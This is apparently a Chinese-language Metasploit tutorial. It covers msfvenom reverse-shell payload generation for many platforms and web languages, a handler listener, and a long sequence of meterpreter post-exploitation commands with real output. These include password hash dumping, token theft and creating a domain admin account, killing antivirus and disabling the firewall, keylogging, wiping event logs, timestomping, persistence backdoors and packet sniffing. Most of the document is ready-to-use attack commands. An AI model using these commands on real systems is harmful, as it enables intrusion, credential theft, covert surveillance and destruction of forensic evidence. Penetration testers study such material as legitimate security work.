一 Metasploit 目录结构
以 kali 为例,几个关键路径,熟悉一下,为了更方便的查找。
1、msf 的安装路径:
┌──(root㉿kali)-[/usr/share/metasploit-framework]
└─# ls
app documentation metasploit-framework.gemspec msfdb msfupdate Rakefile script-recon
config Gemfile modules msf-json-rpc.ru msfvenom ruby scripts
data Gemfile.lock msfconsole msfrpc msf-ws.ru script-exploit tools
db lib msfd msfrpcd plugins script-password vendor
2、模块路径:
┌──(root㉿kali)-[/usr/share/metasploit-framework/modules]
└─# ls
auxiliary encoders evasion exploits nops payloads post
auxiliary:辅助模块
encoders:编码工具模块
exploits:攻击模块
nops:由于 IDS/IPS 会检查数据包中不规则的数据,所以在某些场合下(比如针对
溢出攻击),某些特殊的滑行字符串(NOPS x90x90…)则会因为被拦截而导致攻击
失效,所以此时需要修改 exploit 中的 NOPs.nops 文件夹下的东西会在 payload
生成时用到(后面会有介绍)。比如我们打开 php 的 NOPS 生成脚本,就会发现它只
是返回了指定长度的空格而已。
payloads:载荷模块
post:后渗透模块
3、脚本运行的日志记录,有些时候某些脚本运行后所下载的文件就在这个目录下
/root/.msf4/logs
二 Metasploit 前期渗透
1、msfconsole
msfconsole -r //加载 resources 脚本
2、msfvenom
在原有的 msfpayload 和 msfencode 的基础上,msfvencom 是将两个工具进行了结合,新版
本的 msf 中已经去除了 msfpayload 和 msfencode,由 msfvencom 取代。
└─# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
-p 选择需要使用的 payload,如果需要使用自定义的 payload,请使用’-'或者 stdin 指定
-l 列出模块的所有资源
-n 为 payload 预先指定一个 NOP 滑动长度
-f 指定输出格式,使用 --help-formats 来获取 msf 支持的输出格式列表
-e 指定需要使用的编码器
-a 指定 payload 的目标架构
-s 设定有效攻击荷载的最大长度
-b 设定规避字符集,比如: ‘\x00\xff’
-i 指定 payload 的编码次数
-c 指定一个附加的 win32 shellcode 文件
-x 指定一个自定义的可执行文件作为模板
-k 保护模板程序的动作,注入的 payload 作为一个新的进程运行
-o 查看需要配置的信息,例如(lhost,lport 等)
-h 帮助
2.1、system payloads
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your
Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port
to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f macho > shell.macho
2.2 Web Payloads
PHP(文件的头尾记得添加<?php ?>)
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f raw > shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port
to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f war > shell.war
2.3 Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f raw > shell.pl
2.4 Based Shellcode
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your
Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port
to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
Connect On> -f <language>
2.5 Handlers
客户端监听对应端口,监听 payload 运行成功后的反弹连接,获得 sessions 会话。
msfconsole
.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit
=[ metasploit v6.1.39-dev ]
+ -- --=[ 2214 exploits - 1171 auxiliary - 396 post ]
+ -- --=[ 616 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: To save all commands executed since start up
to a file, use the makerc command
msf6 >
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
三、Metasploit 后期渗透
后期渗透主要针对于 meterpreter 模式下的运用。
1、查看权限
meterpreter > getuid
Server username: USER-20221118VY\Administrator
meterpreter >
2、查看进程
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
8 924 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 C:\Windows\System32\fontdrvhost.exe
108 4 Registry x64 0
440 4 smss.exe x64 0
512 836 services.exe x64 0
528 836 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
556 512 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
724 648 csrss.exe x64 0
828 820 csrss.exe x64 1
836 648 wininit.exe x64 0
924 820 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
1012 2164 firefox.exe x64 1 USER-20221118VY\Administrator
3、检测是否为虚拟机
meterpreter > run post/windows/gather/checkvm
[*] Checking if the target is a Virtual Machine ...
[*] The target appears to be a Physical Machine
meterpreter >
4、提升本地权限(普通方法)
meterpreter > use priv
[!] The "priv" extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
5、指定进程窃取令牌
从一个给定的进程 ID 中窃取一个域管理员组令牌,添加一个域账户,并把域账户添加到域
管理员组中:
meterpreter > ps
meterpreter > steal_token 1784
meterpreter > shell
C:\windows\system32>net user metasploit password /ADD /DOMAIN
C:\windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN
6、GET HASH(普通方法)
meterpreter > use priv
[!] The "priv" extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:895bee0a11cc1d5f3495bce96c3ead30:::
meterpreter >
7、GET HASH(智能方法)
抓 hash 值(智能做法,相对于普通做法,条件要求不太苛刻):
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against USER-20221118VY
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20230730100022_default_192.168.119.1_windows.hashes_970975.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY cfc3902650bcbf9973e90d90c66e8223...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
8、迁移独立进程
在 windows 2008 中,如果 getsystem 命令和 hashdump 命令抛出异常情况时,你需要迁移到
一个以 SYSTEM 系统权限运行的进程中。
meterpreter > run migrate -p 进程 id
meterpreter > run migrate -p 21092
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Current server process: shell.exe (13896)
[+] Migrating to 21092
[+] Successfully migrated to process
meterpreter >
9、强制关闭杀软
通过 meterpreter 的 killav 脚本来杀死目标主机运行的杀毒软件:
meterpreter > run killav
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
meterpreter >
10、开启键盘记录
可以针对一个特定的进程捕获目标主机上的键盘记录:
meterpreter > migrate 1436(迁移到指定进程)
meterpreter >keyscan_start
meterpreter >keyscan_dump
meterpreter >keyscan_stop
11、匿名冒充管理员
meterpreter >use incognito
meterpreter >list_tokens -u
meterpreter >use priv
meterpreter >getsystem
meterpreter >list_tokens
meterpreter >impersonate_token IHAZSECURITY\Administrator3
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
USER-20221118VY\Administrator
Window Manager\DWM-1
Impersonation Tokens Available
========================================
No tokens available
meterpreter > impersonate_token 'NT AUTHORITY\SYSTEM'
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
PS 查看进程后发现,所有的令牌都变成了伪造的管理令牌
getuid 也变为了伪造用户令牌
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
12、查看&&关闭 win 防火墙
查看并且关闭 win 的防火墙和杀软
meterpreter > run getcountermeasure 查看
meterpreter > run getcountermeasure -d -k 关闭
meterpreter > run getcountermeasure
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] ▒▒ ▒▒▒▒▒ļ▒▒▒▒▒:
[*] -------------------------------------------------------------------
[*] ▒▒▒▒ģʽ = ▒▒▒▒
[*] ▒▒▒▒ģʽ = ▒▒▒▒
[*]
[*] ▒▒ ▒▒▒▒▒ļ▒▒▒▒▒(▒▒ǰ):
[*] -------------------------------------------------------------------
[*] ▒▒▒▒ģʽ = ▒▒▒▒
[*] ▒▒▒▒ģʽ = ▒▒▒▒
[*]
[*] ▒▒Ҫ▒▒Ϣ: ▒ѳɹ▒ִ▒▒▒▒▒
[*] ▒▒▒ǣ▒"netsh firewall" ▒▒▒▒▒ã▒
[*] ▒▒▒▒▒ "netsh advfirewall firewall" ▒▒
[*] ▒й▒ʹ▒▒ "netsh advfirewall firewall" ▒▒▒▒
[*] ▒▒▒ "netsh firewall" ▒▒▒▒ϸ▒▒Ϣ▒▒▒▒▒▒▒
[*] https://go.microsoft.com/fwlink/?linkid=121488 ▒ϵ▒ KB ▒▒▒▒ 947709▒▒
[*]
[*]
[*] Checking DEP Support Policy...
meterpreter > run getcountermeasure -d -k
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] ▒▒ ▒▒▒▒▒ļ▒▒▒▒▒:
[*] -------------------------------------------------------------------
[*] ▒▒▒▒ģʽ = ▒▒▒▒
[*] ▒▒▒▒ģʽ = ▒▒▒▒
[*]
[*] ▒▒ ▒▒▒▒▒ļ▒▒▒▒▒(▒▒ǰ):
[*] -------------------------------------------------------------------
[*] ▒▒▒▒ģʽ = ▒▒▒▒
[*] ▒▒▒▒ģʽ = ▒▒▒▒
[*]
[*] ▒▒Ҫ▒▒Ϣ: ▒ѳɹ▒ִ▒▒▒▒▒
[*] ▒▒▒ǣ▒"netsh firewall" ▒▒▒▒▒ã▒
[*] ▒▒▒▒▒ "netsh advfirewall firewall" ▒▒
[*] ▒й▒ʹ▒▒ "netsh advfirewall firewall" ▒▒▒▒
[*] ▒▒▒ "netsh firewall" ▒▒▒▒ϸ▒▒Ϣ▒▒▒▒▒▒▒
[*] https://go.microsoft.com/fwlink/?linkid=121488 ▒ϵ▒ KB ▒▒▒▒ 947709▒▒
[*]
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...
13、查看基本信息
meterpreter > sysinfo
Computer : USER-20221118VY
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : zh_CN
Domain : WorkGroup
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
14、查看闲置时间
目标系统的闲置时间:
meterpreter > idletime
User has been idle for: 0 secs
meterpreter >
15、清理日志记录
清理事件日志:
meterpreter > clearev
[*] Wiping 18466 records from Application...
[*] Wiping 8021 records from System...
[*] Wiping 33554 records from Security...
meterpreter >
16、远程端运行指定程序
使远程端系统运行某程序(-H 不可见 -i 交互):
meterpreter > execute -H -i -f cmd
Process 15524 created.
Channel 8 created.
Microsoft Windows [▒汾 10.0.19045.3208]
(c) Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒
C:\Users\Administrator\Desktop>
17、修改文件时间属性
修改文件属性(文件创建时间改变)
meterpreter > timestomp c:\1.txt -c “11/11/2011 11:11:11”
18、文件的上传&&下载
从目标机下载文件到本地主机(-r 指定下载到的目录):
meterpreter > download c:\\1.txt -r /root/
从本地机上传文件到目标主机(-r 指定上传的路径):
meterpreter > upload /root/Desktop/hack.txt -r c:\\
19、远程主机截屏
screenshot
meterpreter > screenshot
Screenshot saved to: /usr/share/metasploit-framework/modules/FaNdabKc.jpeg
meterpreter >
20、开启/关闭鼠标键盘
禁止/开启远程机键盘/鼠标(使用关闭命令后,对方将无法使用鼠标或键盘。)
meterpreter > uictl enable keyboard
meterpreter > uictl enable keyboard
meterpreter > uictl enable mouse
meterpreter > uictl disable mouse
meterpreter > uictl -h
Usage: uictl [enable/disable] [keyboard/mouse/all]
meterpreter >
21、查看摄像头列表
远程主机摄像头列表查看:
meterpreter > webcam_list
22、搜索指定文件
搜索目标主机 c 盘下的 1.txt 文件:
meterpreter > search -d c:\ -f shell.txt
meterpreter > search -d c:\\ -f shell.exe
Found 2 results...
==================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Administrator\AppData\Roaming\MobaXterm\slash\RemoteFiles\3606188_9_1\shell.exe 354 2023-07-30 09:50:14 -0400
c:\Users\Administrator\Desktop\shell.exe 7168 2023-07-30 09:53:13 -0400
meterpreter >
23、跳出 meterpreter 模式
退回到上级菜单,让 meterpreter 在后台运行:background 或者bg
meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(multi/handler) >
返回上次的会话
sessions -i <会话编号>
msf6 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter >
24、查看 ip
ipconfig
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 5
============
Name : Realtek PCIe GbE Family Controller
Hardware MAC : 2c:4d:54:97:d7:f2
MTU : 1500
IPv4 Address : 169.254.92.113
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::1ac6:c1e6:3a80:4417
IPv6 Netmask : ffff:ffff:ffff:ffff::
25、切换 cmd 模式
进入 windows 的 cmd 模式(exit 回到 meterpreter 模式):
shell
meterpreter > shell
Process 9848 created.
Channel 9 created.
Microsoft Windows [▒汾 10.0.19045.3208]
(c) Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒
C:\Users\Administrator\Desktop>
26、进入 ruby 终端
进入 ruby(面向对象脚本编程)终端:
meterpreter > irb
[*] Starting IRB shell...
[*] You are in the "client" (session) object
>>
27、查看远程目录
查看远程主机的工作目录(反弹马的工作路径):
getwd
meterpreter > getwd
C:\Users\Administrator\Desktop
meterpreter >
28、查看本地目录
获得本地工作目录:
getlwd
meterpreter > getlwd
/usr/share/metasploit-framework/modules
meterpreter >
29、查看远程文件
查看远程主机文件:
cat c:\1.txt
30、编辑远程文件
编辑远程主机文件:
meterpreter > edit c:\1.txt
31、查看路由表信息
获得路由表信息:
route
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.0.1 50 7
127.0.0.0 255.0.0.0 127.0.0.1 331 1
127.0.0.1 255.255.255.255 127.0.0.1 331 1
127.255.255.255 255.255.255.255 127.0.0.1 331 1
192.168.0.0 255.255.255.0 192.168.0.106 306 7
192.168.0.106 255.255.255.255 192.168.0.106 306 7
192.168.0.255 255.255.255.255 192.168.0.106 306 7
192.168.119.0 255.255.255.0 192.168.119.1 291 13
192.168.119.1 255.255.255.255 192.168.119.1 291 13
192.168.119.255 255.255.255.255 192.168.119.1 291 13
192.168.245.0 255.255.255.0 192.168.245.1 291 15
192.168.245.1 255.255.255.255 192.168.245.1 291 15
192.168.245.255 255.255.255.255 192.168.245.1 291 15
224.0.0.0 240.0.0.0 127.0.0.1 331 1
224.0.0.0 240.0.0.0 192.168.0.106 306 7
224.0.0.0 240.0.0.0 192.168.119.1 291 13
224.0.0.0 240.0.0.0 192.168.245.1 291 15
255.255.255.255 255.255.255.255 127.0.0.1 331 1
255.255.255.255 255.255.255.255 192.168.0.106 306 7
255.255.255.255 255.255.255.255 192.168.119.1 291 13
255.255.255.255 255.255.255.255 192.168.245.1 291 15
No IPv6 routes were found.
meterpreter >
32、端口转发(经常用到)
端口转发(将远程主机的 3389 端口转到本地的 1234 端口):
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.0.106
33、查杀指定进程
kill pid
34、添加远程账户
run getgui -u test -p admin123
meterpreter > run getgui -u test -p admin123
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] Adding User: test with Password: admin123
[-] Account could not be created
[-] Error:
[-] ▒▒▒▒ɹ▒▒▒ɡ▒
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20230730.5319.rc
meterpreter >
35、关机操作
meterpreter > shutdown
36、创建后门
创建后门 1(开机自启动 vbs 脚本,-i 为连接等待时间):
meterpreter > run persistence -X -i 5 -p 555 -r 目标机 ip
创建后门 2(上传 dll 文件到目标机):
meterpreter > run metsvc
配合本地利用监听模块进行连接。端口需要对应。
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
37、窃取文件访问记录
窃取近期远程主机系统操作,文件访问记录:
meterpreter > run post/windows/gather/dumplinks
38、窃取软件安装信息
窃取远程主机的软件安装信息:
meterpreter > run post/windows/gather/enum_applications
39、Sniffer 监听(经常用到)
监听操作:
meterpreter > use sniffer //使用 sniffer
meterpreter > sniffer_interfaces //查看网卡
meterpreter > sniffer_interfaces 1 //选择网卡
meterpreter > sniffer_start 1 //开启对应网卡的监听
meterpreter > sniffer_dump 1 /root/Desktop/123.cap //将监听到的数据包保存到本地
meterpreter > sniffer_stop 1 //停止监听
40、窃取 IE 缓存信息
窃取目标机 ie 缓存,理论上 IE 版本要高于 IE 7.0
meterpreter > run post/windows/gather/enum_ie
41、添加路由
添加路由,实现跨网段:
查询网段和子网掩码:
meterpreter > run get_local_subnets
meterpreter > background //跳出 meterpreter 模式
msf exploit(handler) > route add 10.10.10.0 255.255.255.0 2 //最后面的 2 为 session 会话 id
msf exploit(handler) > route print //查看路由跳转
msf 成功将会话 2 上添加了 10.10.10.0/24 这个网段的路由,攻击者对这个网段的流量都通过
会话 2 转发
42、自动信息搜集
可以下载注册表,获取 hash,环境变量,开启的服务,系统信息,默认共享等内容。
meterpreter > run scraper
脚本运行完毕,日志会记录在如下目录,进入如下目录,获取相关下载的信息。
root@kali:~# find / -name scraper
root@kali:~/.msf4/logs/scripts/scraper
